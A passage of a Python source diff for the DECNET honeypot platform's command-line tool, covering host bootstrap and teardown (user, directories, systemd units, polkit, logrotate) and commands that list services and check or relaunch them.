 # type = sqlite                          # or "mysql"
 # url = mysql+asyncmy://user@host:3306/decnet   # if set, wins over host/port/name/user
 # host = localhost
 # port = 3306
 # name = decnet
 # user = decnet
 # [bus]
 # enabled = true
 # type = unix                            # or "fake"
 # socket = /run/decnet/bus.sock
 # group = decnet
 # [swarm]
 # master-host = 10.0.0.1
 # syslog-port = 6514
 # swarmctl-port = 8770
 # swarmctl-host = 127.0.0.1
 # [logging]
 # system-log = /var/log/decnet/decnet.system.log
 # ingest-log = /var/log/decnet/decnet.log
 # agent-log  = /var/log/decnet/agent.log
 # [ingester]
 # batch-size = 100
 # batch-max-wait-ms = 250
 # [tracing]
 # enabled = false
 # otel-endpoint = http://localhost:4317
 # [agent]
 # Managed by the enroll bundle — do NOT edit by hand on an agent host.
 """
 def _deploy_root() -> Path:
    """Locate the ``deploy/`` directory that sits next to the ``decnet`` package.

    The lookup goes two levels up from the package's ``__file__`` and appends
    ``deploy``; the directory is accepted only if it contains
    ``decnet.target``. That layout matches an editable install from a git
    checkout.

    Returns:
        Path: The resolved ``deploy/`` directory.

    Raises:
        RuntimeError: If ``deploy/decnet.target`` is not a regular file.
    """
    package_dir = Path(_decnet_pkg.__file__).resolve().parent
    root = package_dir.parent / "deploy"
    marker = root / "decnet.target"
    if marker.is_file():
        return root
    raise RuntimeError(
        f"cannot locate deploy/ directory (looked at {root}); "
        "are you on a wheel install that didn't bundle deploy/? "
        "use `pip install -e .` from a git checkout"
    )
 def _sha256(path: Path) -> str:
    h = hashlib.sha256()
    h.update(path.read_bytes())
    return h.hexdigest()
 def _run(argv: List[str], *, dry_run: bool) -> None:
    """Execute *argv* as a subprocess, or just print it in dry-run mode.

    Args:
        argv: Full argument vector; passed to ``subprocess.run`` as a list.
        dry_run: When true, print the command line and run nothing.

    Raises:
        subprocess.CalledProcessError: If the command exits non-zero
            (``check=True``).
    """
    if not dry_run:
        log.info("init: exec %s", argv)
        subprocess.run(argv, check=True)  # nosec B603
        return
    console.print(f"  [dim]would run:[/] {' '.join(argv)}")
 def _step(label: str, action: Callable[[], str]) -> bool:
    """Invoke *action* and print one checklist line describing the outcome.

    The callable's return string selects the line:
    a value starting with ``"skip:"`` prints ``[SKIP] <label> (<reason>)``;
    any other value prints ``[ OK ] <label>``.
    If the callable raises, ``[FAIL] <label>: <err>`` is printed and the
    exception propagates unchanged.

    Returns:
        bool: Always True when the callable returned normally.
    """
    try:
        outcome = action()
    except Exception as exc:  # noqa: BLE001
        console.print(f"[red][FAIL][/] {label}: {exc}")
        raise
    skip_prefix = "skip:"
    if not outcome.startswith(skip_prefix):
        console.print(f"[green][ OK ][/] {label}")
        return True
    # Everything after the prefix is the human-readable reason.
    reason = outcome[len(skip_prefix):].strip()
    console.print(f"[yellow][SKIP][/] {label} ({reason})")
    return True
 def _ensure_group(group: str, *, dry_run: bool) -> str:
    try:
        grp.getgrnam(group)
        return f"skip: group {group} already exists"
    except KeyError:
        _run(["groupadd", "--system", group], dry_run=dry_run)
        return "ok"
 def _ensure_user(user: str, group: str, install_dir: str, *, dry_run: bool) -> str:
    try:
        pwd.getpwnam(user)
        return f"skip: user {user} already exists"
    except KeyError:
        _run(
            [
                "useradd", "--system",
                "--gid", group,
                "--home-dir", install_dir,
                "--shell", "/usr/sbin/nologin",
                "--comment", "DECNET honeypot",
                user,
            ],
            dry_run=dry_run,
        )
        return "ok"
 def _ensure_dir(
    path: Path, *, mode: int, owner: str, group: str, dry_run: bool
 ) -> str:
    existed = path.exists()
    if dry_run:
        console.print(
            f"  [dim]would ensure dir:[/] {path} (mode={oct(mode)}, "
            f"owner={owner}:{group})"
        )
        return "skip: dry-run" if existed else "ok"
    path.mkdir(parents=True, exist_ok=True)
    try:
        os.chmod(path, mode)
        uid = pwd.getpwnam(owner).pw_uid
        gid = grp.getgrnam(group).gr_gid
        os.chown(path, uid, gid)
    except (KeyError, PermissionError):
        # owner/group not yet created, or we're not root (--prefix tests).
        # mkdir is the load-bearing part; perm bits come back on the real
        # root run.
        pass
    return f"skip: {path} already present" if existed else "ok"
 def _ensure_config(
    path: Path, group: str, *, user: str, dry_run: bool,
 ) -> str:
    if path.exists():
        return f"skip: {path} already present"
    if dry_run:
        console.print(f"  [dim]would write:[/] {path}")
        return "ok"
    path.parent.mkdir(parents=True, exist_ok=True)
    rendered = _CONFIG_PLACEHOLDER.format(api_user=user, api_group=group)
    path.write_text(rendered)
    try:
        os.chmod(path, 0o640)
        gid = grp.getgrnam(group).gr_gid
        os.chown(path, 0, gid)
    except (KeyError, PermissionError):
        pass
    return "ok"
 def _copy_if_changed(
    src: Path, dst: Path, *, mode: int, force: bool, dry_run: bool
 ) -> str:
    if dst.exists() and not force and _sha256(src) == _sha256(dst):
        return f"skip: {dst} up to date"
    if dry_run:
        console.print(f"  [dim]would install:[/] {src} -> {dst} (mode={oct(mode)})")
        return "ok"
    dst.parent.mkdir(parents=True, exist_ok=True)
    shutil.copy2(src, dst)
    try:
        os.chmod(dst, mode)
        os.chown(dst, 0, 0)
    except PermissionError:
        pass
    return "ok"
 def _render_template(src: Path, context: dict[str, str]) -> str:
    """Render the Jinja2 template file *src* with *context* and return the text.

    The environment uses ``StrictUndefined`` so that a variable missing from
    *context* raises instead of rendering as an empty string, and keeps the
    template's trailing newline.
    """
    jinja_env = Environment(
        loader=FileSystemLoader(str(src.parent)),
        undefined=StrictUndefined,
        keep_trailing_newline=True,
        autoescape=False,  # nosec B701 — rendering systemd INI, not HTML
    )
    return jinja_env.get_template(src.name).render(**context)
 def _write_rendered_if_changed(
    src: Path, dst: Path, rendered: str, *, mode: int, force: bool, dry_run: bool
 ) -> str:
    """Write *rendered* content to *dst* only if it differs from what's there.
    SHA compares rendered-output ↔ on-disk bytes (NOT source-template ↔
    on-disk) so operators who customise their install_dir get idempotent
    re-runs instead of every ``decnet init`` rewriting files.
    """
    rendered_bytes = rendered.encode("utf-8")
    if dst.exists() and not force:
        if hashlib.sha256(dst.read_bytes()).hexdigest() == hashlib.sha256(rendered_bytes).hexdigest():
            return f"skip: {dst} up to date"
    if dry_run:
        console.print(f"  [dim]would render:[/] {src} -> {dst} (mode={oct(mode)})")
        return "ok"
    dst.parent.mkdir(parents=True, exist_ok=True)
    dst.write_bytes(rendered_bytes)
    try:
        os.chmod(dst, mode)
        os.chown(dst, 0, 0)
    except PermissionError:
        pass
    return "ok"
 def _resolve_venv_dir(install_dir: str, explicit: str | None) -> str:
    """Pick the virtualenv systemd units should ExecStart out of.
    Priority:
      1. ``--venv-dir`` flag (explicit; absolute path required).
      2. ``VIRTUAL_ENV`` env var, but only when it lives under
         ``install_dir`` (refuse to bake /home/user/.venv into a system
         service — that directory is user-owned and may vanish).
      3. ``{install_dir}/venv``  — what ``enroll_bootstrap.sh`` creates
         on fresh agents; the production default.
      4. First hit from a short list of dev-box conventions under
         ``install_dir``:  ``.venv``, ``.311``, ``.312``, ``.313``.
    Raises RuntimeError with an operator-friendly message if none of
    those resolve to a directory containing ``bin/decnet``. Failing loud
    at init time beats systemd spamming journalctl with
    'Failed at step EXEC spawning .../venv/bin/decnet: No such file or
    directory' on every auto-restart.
    """
    install_path = Path(install_dir)
    candidates: list[Path] = []
    if explicit:
        if not explicit.startswith("/"):
            raise RuntimeError(
                f"--venv-dir must be an absolute path, got {explicit!r}"
            )
        candidates.append(Path(explicit))
    else:
        virtual_env = os.environ.get("VIRTUAL_ENV")
        if virtual_env:
            ve_path = Path(virtual_env)
            try:
                ve_path.relative_to(install_path)
                candidates.append(ve_path)
            except ValueError:
                # VIRTUAL_ENV lives outside install_dir — don't bake a
                # user-home venv into a root-owned systemd unit.
                pass
        candidates.append(install_path / "venv")
        for name in (".venv", ".311", ".312", ".313"):
            candidates.append(install_path / name)
    for cand in candidates:
        if (cand / "bin" / "decnet").is_file():
            return str(cand)
    searched = ", ".join(str(c) for c in candidates)
    raise RuntimeError(
        "Could not find a DECNET venv. Create one first (e.g. "
        f"`python -m venv {install_path}/venv && "
        f"{install_path}/venv/bin/pip install -e {install_path}[dev]`) "
        "or pass --venv-dir. Searched: " + searched
    )
 def _install_units(
    deploy: Path,
    systemd_dir: Path,
    *,
    install_dir: str,
    venv_dir: str,
    user: str,
    group: str,
    force: bool,
    dry_run: bool,
 ) -> str:
    """Install the systemd unit files into *systemd_dir*.

    Every ``decnet-*.service.j2`` template under *deploy* is rendered with
    ``install_dir`` / ``venv_dir`` / ``user`` / ``group`` and written without
    the ``.j2`` suffix; ``decnet.target`` is copied as-is.

    Returns:
        str: ``"skip: ..."`` if no file had to be written, otherwise
        ``"ok (<written>/<total> installed)"``.
    """
    render_ctx = {
        "install_dir": install_dir,
        "venv_dir": venv_dir,
        "user": user,
        "group": group,
    }
    unit_templates = sorted(deploy.glob("decnet-*.service.j2"))
    static_units = [deploy / "decnet.target"]
    outcomes: list[str] = []
    for tpl in unit_templates:
        text = _render_template(tpl, render_ctx)
        # decnet-api.service.j2 → decnet-api.service
        unit_name = tpl.name[: -len(".j2")]
        outcomes.append(
            _write_rendered_if_changed(
                tpl, systemd_dir / unit_name, text,
                mode=0o644, force=force, dry_run=dry_run,
            )
        )
    for unit in static_units:
        outcomes.append(
            _copy_if_changed(
                unit, systemd_dir / unit.name,
                mode=0o644, force=force, dry_run=dry_run,
            )
        )
    written = sum(1 for outcome in outcomes if not outcome.startswith("skip:"))
    total = len(unit_templates) + len(static_units)
    if written:
        return f"ok ({written}/{total} installed)"
    return f"skip: {total} unit files up to date"
 def _install_polkit(
    deploy: Path, rules_dir: Path, *, group: str, force: bool, dry_run: bool
 ) -> str:
    """Render the group-scoped polkit rule to /etc/polkit-1/rules.d/.
    The rule has to reference the same POSIX group passed via --group —
    otherwise the API (running as that user) can't
    systemctl start/stop decnet-*.service without an interactive auth
    prompt that never gets answered in a daemon context.
    """
    src = deploy / "polkit" / "50-decnet-workers.rules.j2"
    if not src.is_file():
        raise RuntimeError(f"missing polkit rule template at {src}")
    rendered = _render_template(src, {"group": group})
    # 50-decnet-workers.rules.j2 → 50-decnet-workers.rules
    dst_name = src.name[: -len(".j2")]
    return _write_rendered_if_changed(
        src, rules_dir / dst_name, rendered,
        mode=0o644, force=force, dry_run=dry_run,
    )
 def _run_allow_fail(argv: List[str], *, dry_run: bool) -> str:
    """Run *argv* like ``_run`` does, but treat a non-zero exit as a skip.

    Returns:
        str: ``"ok"`` on exit status 0 (or in dry-run), otherwise
        ``"skip: rc=<code> (already absent)"``.
    """
    if dry_run:
        console.print(f"  [dim]would run (allow fail):[/] {' '.join(argv)}")
        return "ok"
    log.info("init: exec (allow fail) %s", argv)
    completed = subprocess.run(argv, check=False)  # nosec B603
    if completed.returncode == 0:
        return "ok"
    return f"skip: rc={completed.returncode} (already absent)"
 def _remove_file(path: Path, *, dry_run: bool) -> str:
    if not path.exists() and not path.is_symlink():
        return f"skip: {path} already absent"
    if dry_run:
        console.print(f"  [dim]would remove:[/] {path}")
        return "ok"
    path.unlink()
    return "ok"
 def _uninstall_units(systemd_dir: Path, *, dry_run: bool) -> str:
    removed = 0
    present = sorted(systemd_dir.glob("decnet-*.service"))
    target = systemd_dir / "decnet.target"
    if target.exists():
        present.append(target)
    for path in present:
        if dry_run:
            console.print(f"  [dim]would remove:[/] {path}")
            removed += 1
            continue
        path.unlink()
        removed += 1
    if removed == 0:
        return "skip: no decnet unit files present"
    return f"ok ({removed} removed)"
 def _remove_user(user: str, *, dry_run: bool) -> str:
    try:
        pwd.getpwnam(user)
    except KeyError:
        return f"skip: user {user} already absent"
    # userdel returns non-zero if the user still owns running
    # processes; that's the operator's problem to sort out, not ours.
    return _run_allow_fail(["userdel", user], dry_run=dry_run)
 def _remove_group(group: str, *, dry_run: bool) -> str:
    try:
        grp.getgrnam(group)
    except KeyError:
        return f"skip: group {group} already absent"
    return _run_allow_fail(["groupdel", group], dry_run=dry_run)
 def _remove_dir_if_present(
    path: Path, *, dry_run: bool, recursive: bool = False
 ) -> str:
    if not path.exists():
        return f"skip: {path} already absent"
    if dry_run:
        verb = "would rm -rf" if recursive else "would rmdir"
        console.print(f"  [dim]{verb}:[/] {path}")
        return "ok"
    if recursive:
        shutil.rmtree(path, ignore_errors=True)
    else:
        try:
            path.rmdir()
        except OSError as exc:
            return f"skip: {path} not empty ({exc.strerror})"
    return "ok"
 def _install_tmpfiles(
     deploy: Path, tmpfiles_dir: Path, *, force: bool, dry_run: bool
 ) -> str:
     """Install ``tmpfiles.d/decnet.conf`` from ``deploy`` and apply it.

     Returns the status string produced by ``_copy_if_changed``.

     Raises:
         RuntimeError: if the source entry is missing from ``deploy``.
     """
     source = deploy / "tmpfiles.d" / "decnet.conf"
     if not source.is_file():
         raise RuntimeError(f"missing tmpfiles.d entry at {source}")
     installed = tmpfiles_dir / source.name
     outcome = _copy_if_changed(
         source, installed, mode=0o644, force=force, dry_run=dry_run,
     )
     # Apply immediately so /run/decnet exists before daemon-reload.
     _run(["systemd-tmpfiles", "--create", str(installed)], dry_run=dry_run)
     return outcome
 def _install_logrotate(
     deploy: Path, logrotate_dir: Path, *, force: bool, dry_run: bool
 ) -> str:
     """Install the shipped logrotate rule as ``<logrotate_dir>/decnet``.

     The shipped rule relies on ``copytruncate`` (not rename+create)
     because the ingester / forwarder keep the log files open from
     Python. Without rotation /var/log/decnet/ grows without bound, and
     one noisy day of attacker traffic can fill a small VPS disk.
     Best-effort: a host without logrotate (rare on systemd distros)
     still boots fine; the operator has to wire their own rotation.

     Returns the status string produced by ``_copy_if_changed``.

     Raises:
         RuntimeError: if the config is missing from ``deploy``.
     """
     source = deploy / "logrotate.d" / "decnet"
     if source.is_file():
         destination = logrotate_dir / source.name
         return _copy_if_changed(
             source, destination,
             mode=0o644, force=force, dry_run=dry_run,
         )
     raise RuntimeError(f"missing logrotate config at {source}")
 def register(app: typer.Typer) -> None:
     """Attach the ``init`` command (bootstrap and ``--deinit`` teardown) to ``app``."""
     @app.command(name="init")
     def init_cmd(
         dry_run: bool = typer.Option(
             False, "--dry-run",
             help="Print every action; make no changes.",
         ),
         no_start: bool = typer.Option(
             False, "--no-start",
             help="Install everything but don't `systemctl enable --now decnet.target`.",
         ),
         force: bool = typer.Option(
             False, "--force",
             help="Overwrite unit / polkit / tmpfiles entries even if identical.",
         ),
         deinit: bool = typer.Option(
             False, "--deinit",
             help="Undo a previous init: stop + disable decnet.target, remove "
                  "unit files, polkit rule, tmpfiles.d entry, /etc/decnet. "
                  "Preserves /var/lib/decnet, /var/log/decnet, and the "
                  "service user/group — pass --purge to remove those too.",
         ),
         purge: bool = typer.Option(
             False, "--purge",
             help="With --deinit, also wipe /var/lib/decnet, "
                  "/var/log/decnet, AND the service user/group. "
                  "Destructive — operator data is gone, and if --user "
                  "points at your own login account, that account goes "
                  "with it. Only use when the user/group was created by "
                  "`decnet init` in the first place.",
         ),
         user: str = typer.Option(
             "decnet", "--user",
             help="System user to own DECNET processes.",
         ),
         group: str = typer.Option(
             "decnet", "--group",
             help="Primary group of the DECNET user.",
         ),
         install_dir: str = typer.Option(
             "/opt/decnet", "--install-dir",
             help="Absolute path where DECNET is installed. Default "
                  "/opt/decnet; distros that reserve /opt can point this "
                  "at /srv/decnet, /usr/local/decnet, etc. Gets rendered "
                  "into every systemd unit via Jinja2 and used as the "
                  "decnet user's home directory.",
         ),
         venv_dir: Optional[str] = typer.Option(
             None, "--venv-dir",
             help="Absolute path to the Python venv systemd should "
                  "ExecStart from. If omitted, auto-detected in order: "
                  "$VIRTUAL_ENV (if under --install-dir), "
                  "{install-dir}/venv, then {install-dir}/{.venv,.311,"
                  ".312,.313}. Init aborts if none exists.",
         ),
         prefix: str = typer.Option(
             "", "--prefix", hidden=True,
             help="Filesystem prefix for tests (e.g. tmp_path). Empty = real root.",
         ),
     ) -> None:
         """One-shot bootstrap of a DECNET master host.
         Creates the `decnet` user/group, installs systemd units,
         polkit rules, tmpfiles.d entries, seeds directories and
         drops a placeholder config, then starts decnet.target.
         """
         _require_master_mode("init")
         # Sub-command name used in every "decnet <verb>: ..." diagnostic.
         verb = "deinit" if deinit else "init"
         if purge and not deinit:
             console.print("[red]--purge only applies with --deinit[/]")
             raise typer.Exit(1)
         # Root check — skip when --prefix is set (tests don't run as root).
         if not prefix and os.geteuid() != 0:
             console.print(f"[red]decnet {verb}: must run as root (use sudo)[/]")
             raise typer.Exit(1)
         if not install_dir.startswith("/"):
             console.print(
                 f"[red]decnet {verb}: --install-dir must be absolute, got {install_dir!r}[/]"
             )
             raise typer.Exit(1)
         # Strip leading slash so pfx-joining works under --prefix test mode
         # (Path("/").  / "/opt/decnet" == Path("/opt/decnet"), dropping pfx).
         _install_rel = install_dir.lstrip("/")
         # Only demand the binaries this invocation will actually run:
         # userdel / groupdel are invoked solely by the --purge steps.
         required_tools: tuple[str, ...]
         if deinit:
             required_tools = ("systemctl",)
             if purge:
                 required_tools += ("userdel", "groupdel")
         else:
             required_tools = (
                 "systemctl", "useradd", "groupadd", "systemd-tmpfiles",
             )
         for tool in required_tools:
             # Dry runs execute nothing, so a missing tool is not fatal there.
             if shutil.which(tool) is None and not dry_run:
                 console.print(f"[red]decnet {verb}: {tool!r} is required on PATH[/]")
                 raise typer.Exit(1)
         pfx = Path(prefix) if prefix else Path("/")
         systemd_dir = pfx / "etc/systemd/system"
         polkit_dir = pfx / "etc/polkit-1/rules.d"
         tmpfiles_dir = pfx / "etc/tmpfiles.d"
         logrotate_dir = pfx / "etc/logrotate.d"
         etc_decnet = pfx / "etc/decnet"
         if deinit:
             console.print(
                 f"[bold cyan]DECNET deinit[/] "
                 f"(dry_run={dry_run}, purge={purge})"
             )
             _step(
                 "systemctl stop + disable decnet.target",
                 lambda: _run_allow_fail(
                     ["systemctl", "disable", "--now", "decnet.target"],
                     dry_run=dry_run,
                 ),
             )
             _step(
                 "remove systemd unit files",
                 lambda: _uninstall_units(systemd_dir, dry_run=dry_run),
             )
             _step(
                 "remove polkit rule",
                 lambda: _remove_file(
                     polkit_dir / "50-decnet-workers.rules",
                     dry_run=dry_run,
                 ),
             )
             _step(
                 "remove tmpfiles.d entry",
                 lambda: _remove_file(
                     tmpfiles_dir / "decnet.conf",
                     dry_run=dry_run,
                 ),
             )
             _step(
                 "remove logrotate config",
                 lambda: _remove_file(
                     logrotate_dir / "decnet",
                     dry_run=dry_run,
                 ),
             )
             _step(
                 "systemctl daemon-reload",
                 lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],  # type: ignore[func-returns-value]
             )
             _step(
                 f"remove {etc_decnet / 'decnet.ini'}",
                 lambda: _remove_file(etc_decnet / "decnet.ini", dry_run=dry_run),
             )
             # Legacy name from pre-domain-sections placeholder era.
             # Harmless if absent (the _remove_file step logs skip).
             _step(
                 f"remove legacy {etc_decnet / 'config.ini'}",
                 lambda: _remove_file(etc_decnet / "config.ini", dry_run=dry_run),
             )
             # The next three removals are non-recursive, so a directory
             # that still has content is left in place.
             _step(
                 f"remove {etc_decnet}",
                 lambda: _remove_dir_if_present(etc_decnet, dry_run=dry_run),
             )
             _step(
                 f"remove {pfx / 'run/decnet'}",
                 lambda: _remove_dir_if_present(
                     pfx / "run/decnet", dry_run=dry_run,
                 ),
             )
             _step(
                 f"remove {pfx / _install_rel}",
                 lambda: _remove_dir_if_present(
                     pfx / _install_rel, dry_run=dry_run,
                 ),
             )
             if purge:
                 _step(
                     f"purge {pfx / 'var/lib/decnet'}",
                     lambda: _remove_dir_if_present(
                         pfx / "var/lib/decnet",
                         dry_run=dry_run, recursive=True,
                     ),
                 )
                 _step(
                     f"purge {pfx / 'var/log/decnet'}",
                     lambda: _remove_dir_if_present(
                         pfx / "var/log/decnet",
                         dry_run=dry_run, recursive=True,
                     ),
                 )
             else:
                 console.print(
                     f"[dim]preserved {pfx / 'var/lib/decnet'} and "
                     f"{pfx / 'var/log/decnet'} (operator data); "
                     "re-run with --purge to remove.[/]"
                 )
             # User / group removal is also gated on --purge. In dev the
             # operator may have passed their own login user via
             # `--user $USER` to avoid ownership churn; an unconditional
             # `userdel anti` during deinit would nuke their account.
             if purge:
                 _step(
                     f"remove user {user!r}",
                     lambda: _remove_user(user, dry_run=dry_run),
                 )
                 _step(
                     f"remove group {group!r}",
                     lambda: _remove_group(group, dry_run=dry_run),
                 )
             else:
                 console.print(
                     f"[dim]preserved user {user!r} and group {group!r}; "
                     "re-run with --purge to remove (only do this if "
                     "they were created by `decnet init`).[/]"
                 )
             console.print("[bold green]DECNET deinit complete.[/]")
             return
         try:
             deploy = _deploy_root()
         except RuntimeError as exc:
             console.print(f"[red]decnet init: {exc}[/]")
             raise typer.Exit(1) from exc
         # Resolve venv BEFORE any file writes — fails loud if the
         # operator hasn't created one yet, instead of shipping broken
         # systemd units that journalctl spams forever. Skipped under
         # --prefix (test mode) because the test harness doesn't build a
         # real venv and the rendered string is asserted on directly.
         if prefix:
             resolved_venv = venv_dir or f"{install_dir}/venv"
         else:
             try:
                 resolved_venv = _resolve_venv_dir(install_dir, venv_dir)
             except RuntimeError as exc:
                 console.print(f"[red]decnet init: {exc}[/]")
                 raise typer.Exit(1) from exc
             console.print(f"[dim]using venv: {resolved_venv}[/]")
         # (path, mode, owner, group) for every directory init guarantees.
         dirs = [
             (pfx / _install_rel, 0o755, user, group),
             (pfx / "var/lib/decnet", 0o750, user, group),
             (pfx / "var/lib/decnet/geoip", 0o755, user, group),
             # DEBT-035 / DEBT-047: artifact root carries setgid (the
             # 0o2... bit) so every file written under it inherits the
             # decnet group regardless of which container's uid created
             # it. Group-write (0o2775) lets the API process and the
             # local TTP worker read each other's outputs without a
             # manual chown after every fresh deploy.
             (pfx / "var/lib/decnet/artifacts", 0o2775, user, group),
             (pfx / "var/log/decnet", 0o750, user, group),
             (etc_decnet, 0o755, "root", group),
             (pfx / "run/decnet", 0o755, "root", group),
         ]
         console.print(
             f"[bold cyan]DECNET init[/] "
             f"(dry_run={dry_run}, no_start={no_start}, force={force})"
         )
         _step(
             f"ensure group {group!r}",
             lambda: _ensure_group(group, dry_run=dry_run),
         )
         _step(
             f"ensure user {user!r}",
             lambda: _ensure_user(user, group, install_dir, dry_run=dry_run),
         )
         for path, mode, d_owner, d_group in dirs:
             # Default arguments freeze the loop variables for this lambda.
             _step(
                 f"ensure dir {path}",
                 lambda p=path, m=mode, o=d_owner, g=d_group:  # type: ignore[misc]
                     _ensure_dir(p, mode=m, owner=o, group=g, dry_run=dry_run),
             )
         _step(
             f"write {etc_decnet / 'decnet.ini'}",
             lambda: _ensure_config(
                 etc_decnet / "decnet.ini", group,
                 user=user, dry_run=dry_run,
             ),
         )
         _step(
             "install systemd units",
             lambda: _install_units(
                 deploy, systemd_dir,
                 install_dir=install_dir, venv_dir=resolved_venv,
                 user=user, group=group,
                 force=force, dry_run=dry_run,
             ),
         )
         _step(
             "install polkit rule",
             lambda: _install_polkit(
                 deploy, polkit_dir, group=group,
                 force=force, dry_run=dry_run,
             ),
         )
         _step(
             "install tmpfiles.d entry",
             lambda: _install_tmpfiles(
                 deploy, tmpfiles_dir, force=force, dry_run=dry_run,
             ),
         )
         _step(
             "install logrotate config",
             lambda: _install_logrotate(
                 deploy, logrotate_dir, force=force, dry_run=dry_run,
             ),
         )
         _step(
             "systemctl daemon-reload",
             lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],  # type: ignore[func-returns-value]
         )
         if no_start:
             console.print("[yellow]--no-start: skipping decnet.target start[/]")
             return
         try:
             _step(
                 "systemctl enable --now decnet.target",
                 lambda: (
                     _run(  # type: ignore[func-returns-value]
                         ["systemctl", "enable", "--now", "decnet.target"],
                         dry_run=dry_run,
                     ),
                     "ok",
                 )[1],
             )
         except subprocess.CalledProcessError as exc:
             console.print(
                 f"[red]decnet.target failed to start (rc={exc.returncode}); "
                 "inspect `systemctl status decnet.target` and individual "
                 "`decnet-*.service` units.[/]"
             )
             raise typer.Exit(1) from exc
         console.print("[bold green]DECNET init complete.[/] "
                       "Check `decnet status` or the Workers panel.")
         sys.stdout.flush()
--- a/decnet/cli/inventory.py
+++ b/decnet/cli/inventory.py
@@ -0,0 +1,53 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import typer
 from rich.table import Table
 from decnet.archetypes import all_archetypes
 from decnet.distros import all_distros
 from decnet.services.registry import all_services
 from .utils import console
 def register(app: typer.Typer) -> None:
     """Attach the read-only listing commands (services, distros, archetypes) to ``app``."""
     @app.command(name="services")
     def list_services() -> None:
         """List all registered honeypot service plugins."""
         registry = all_services()
         table = Table(title="Available Services", show_lines=True)
         for heading, opts in (
             ("Name", {"style": "bold cyan"}),
             ("Ports", {}),
             ("Image", {}),
         ):
             table.add_column(heading, **opts)
         # Rows are ordered by service name.
         for name, plugin in sorted(registry.items(), key=lambda pair: pair[0]):
             port_list = ", ".join(map(str, plugin.ports))
             table.add_row(name, port_list, plugin.default_image)
         console.print(table)
     @app.command(name="distros")
     def list_distros() -> None:
         """List all available OS distro profiles for deckies."""
         table = Table(title="Available Distro Profiles", show_lines=True)
         for heading, opts in (
             ("Slug", {"style": "bold cyan"}),
             ("Display Name", {}),
             ("Docker Image", {"style": "dim"}),
         ):
             table.add_column(heading, **opts)
         profiles = all_distros()
         for slug, profile in sorted(profiles.items(), key=lambda pair: pair[0]):
             table.add_row(slug, profile.display_name, profile.image)
         console.print(table)
     @app.command(name="archetypes")
     def list_archetypes() -> None:
         """List all machine archetype profiles."""
         table = Table(title="Machine Archetypes", show_lines=True)
         for heading, opts in (
             ("Slug", {"style": "bold cyan"}),
             ("Display Name", {}),
             ("Default Services", {"style": "green"}),
             ("Description", {"style": "dim"}),
         ):
             table.add_column(heading, **opts)
         catalogue = all_archetypes()
         for slug, arch in sorted(catalogue.items(), key=lambda pair: pair[0]):
             service_list = ", ".join(arch.services)
             table.add_row(slug, arch.display_name, service_list, arch.description)
         console.print(table)
--- a/decnet/cli/lifecycle.py
+++ b/decnet/cli/lifecycle.py
@@ -0,0 +1,148 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import subprocess  # nosec B404
 from typing import Optional
 import typer
 from rich.table import Table
 from decnet.env import DECNET_INGEST_LOG_FILE
 from . import utils as _utils
 from .gating import _agent_mode_active, _require_master_mode
 from .utils import console, log
 def register(app: typer.Typer) -> None:
     """Attach the ``redeploy``, ``status`` and ``teardown`` commands to ``app``."""
     @app.command()
     def redeploy(
         log_file: str = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", "-f", help="Path to the DECNET log file"),
     ) -> None:
         """Check running DECNET services and relaunch any that are down."""
         log.info("redeploy: checking services")
         registry = _utils._service_registry(str(log_file))
         table = Table(title="DECNET Services", show_lines=True)
         table.add_column("Service", style="bold cyan")
         table.add_column("Status")
         table.add_column("PID", style="dim")
         table.add_column("Action")
         relaunched = 0
         failed = 0
         for name, match_fn, launch_args in registry:
             pid = _utils._is_running(match_fn)
             if pid is not None:
                 table.add_row(name, "[green]UP[/]", str(pid), "—")
                 continue
             try:
                 subprocess.Popen(  # nosec B603
                     launch_args,
                     stdin=subprocess.DEVNULL,
                     stdout=subprocess.DEVNULL,
                     stderr=subprocess.STDOUT,
                     start_new_session=True,
                 )
             except (OSError, subprocess.SubprocessError) as exc:
                 # OSError covers a missing binary as well as e.g. a
                 # non-executable one, so one broken launcher cannot
                 # abort the pass over the remaining services.
                 failed += 1
                 table.add_row(name, "[red]DOWN[/]", "—", f"[red]failed: {exc}[/]")
             else:
                 relaunched += 1
                 table.add_row(name, "[red]DOWN[/]", "—", "[green]relaunched[/]")
         console.print(table)
         if relaunched:
             console.print(f"[green]{relaunched} service(s) relaunched.[/]")
         if failed:
             console.print(f"[red]{failed} service(s) failed to relaunch.[/]")
         # Only claim a healthy fleet when nothing was found down.
         if not relaunched and not failed:
             console.print("[green]All services running.[/]")
     @app.command()
     def status() -> None:
         """Show running deckies and the state of every ``decnet-*`` unit.
         Prefers systemd (``systemctl list-units 'decnet-*.service'``) so
         agents, masters and mixed hosts all get one consistent view of
         what's installed, loaded, and active. Falls back to the psutil
         cmdline registry on boxes without systemd (dev laptops, CI
         containers, non-systemd init) so `decnet status` is still useful
         there.
         """
         log.info("status command invoked")
         from decnet.engine import status as _status
         _status()
         units = _utils._systemd_units()
         # ``None`` selects the psutil fallback; an empty list still takes
         # the systemd path and prints the "no units loaded" hint.
         if units is not None:
             _render_systemd_units(units)
         else:
             _render_psutil_fallback()
     def _render_systemd_units(units: list[dict]) -> None:
         """Print one table row per unit dict, or a hint when ``units`` is empty."""
         if not units:
             console.print(
                 "[yellow]No decnet-* systemd units loaded. "
                 "Run `sudo decnet init` to install them.[/]"
             )
             return
         svc_table = Table(title="DECNET Services (systemd)", show_lines=True)
         svc_table.add_column("Unit", style="bold cyan")
         svc_table.add_column("Load")
         svc_table.add_column("Active")
         svc_table.add_column("Sub")
         svc_table.add_column("Description", style="dim")
         def _active_style(active: str) -> str:
             """Colour the unit's active state: green active, red failed, else yellow."""
             if active == "active":
                 return "[green]active[/]"
             if active == "failed":
                 return "[red]failed[/]"
             return f"[yellow]{active}[/]"
         for u in sorted(units, key=lambda x: x.get("unit", "")):
             svc_table.add_row(
                 u.get("unit", ""),
                 u.get("load", ""),
                 _active_style(u.get("active", "")),
                 u.get("sub", ""),
                 u.get("description", ""),
             )
         console.print(svc_table)
     def _render_psutil_fallback() -> None:
         """Print UP/DOWN per registry service using the process-matching registry."""
         registry = _utils._service_registry(str(DECNET_INGEST_LOG_FILE))
         if _agent_mode_active():
             # In agent mode these three services are hidden from the table.
             registry = [r for r in registry if r[0] not in {"Mutator", "Profiler", "API"}]
         svc_table = Table(
             title="DECNET Services (psutil fallback — systemd unavailable)",
             show_lines=True,
         )
